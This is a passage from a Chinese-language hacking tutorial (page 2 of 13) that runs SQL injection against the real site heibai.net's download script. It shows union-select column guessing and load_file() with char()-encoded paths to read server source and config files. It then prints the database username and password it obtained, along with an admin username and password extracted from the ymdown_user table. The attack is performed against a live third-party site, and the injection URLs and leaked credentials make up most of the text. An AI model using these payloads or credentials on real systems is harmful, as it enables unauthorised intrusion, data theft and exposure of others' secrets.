|
说了这么多下面我们来具体的使用一次,这次测试的对象是国内一著名安全类站点――黑白网络
听人家说黑白有漏洞?我们一起去看看吧。 http://www.heibai.net/down/show.php?id=5403%20and%201=1 正常显示。
如图35 http://www.heibai.net/down/show.php?id=5403%20and%201=2
显示不正常。
如图36 好,我们继续 http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1 显示结果如下
如图37 注意看图中没有显示程序名,而且还附带了 Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578 晕了,网站路径出来了,那可就死定了哦!
我们继续,直到我们猜到 http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 的时候正常显示了。
如图38 好我们转换语句成为 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 显示如图39 看看简介处显示为12,我们可以猜测此处应该为字符型!
Ok,我们下面看看文件内容先 D:/web/heibai/down/show.php转化成ascii后为
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) 我们 view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19 view-source:是指察看源代码,至于为什么用,我们后面将讲到
显示出它的源代码
如图40 因为在show.php中有一句
<META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'>
如果我们直接在浏览器里提交会跳转到list.php
我们发现这句require ("./include/config.inc.php");
好东西,应该放这配置文件,ok继续
d:/web/heibai/down/include/config.inc.php
转化成char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) 我们输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99, 46,112,104,112)),13,14,15,16,17,18,19 显示结果如图41 里面内容主要有 …………………..
ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序
// ------------------------- -------- ------------------------- //
// 常规设置 //
// ------------------------- -------- ------------------------- //
// 数据库信息
$dbhost = "localhost"; // 数据库主机名
$dbuser = "download";// 数据库用户名
$dbpasswd = "kunstar988"; // 数据库密码
$dbname = "download"; // 数据库名
// Cookie 名称
$cookie_name = "heibai";
// 版本号
$version = "1.0.1";
// 数据表名
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
晕原来用的是夜猫的下载系统,而且我们知道了
$dbuser = "download";// 数据库用户名
$dbpasswd = "kunstar988"; // 数据库密码 说不定呆会有用哦。
用的表名是默认的表名,我们知道夜猫的管理员密码放在ymdown_user中
我们继续 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15, 16,17,18,19 from ymdown_user 结果如图42 根据提示我们知道文件大小处的是username,应用平台处的是password(对照图36)
即username=dload,password=6558428,夜猫的后台默认在admin目录下,我试验了很久都没有找到,晕之。
想直接连接mysql,发现telnet端口并没有开放。我们去看看别的吧!
http://www.heibai.net/vip/article/login.php
看起来像是会员的登陆哦,我们看看先
d:/web/heibai/vip/article/login.php
转化成char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112) 我们输入
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19 结果如图43: 其中
require ("./include/global.php");
require ("./include/config.inc.php");
require ("./mainfunction.php");
require ("./function.php");
当然了,我们去看config.inc.php吧
d:/web/heibai/vip/article/include/config.inc.php
转成char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99, 111,110,102,105,103,46,105,110,99,46,112,104,112)
输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99, 111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] 下一页 |
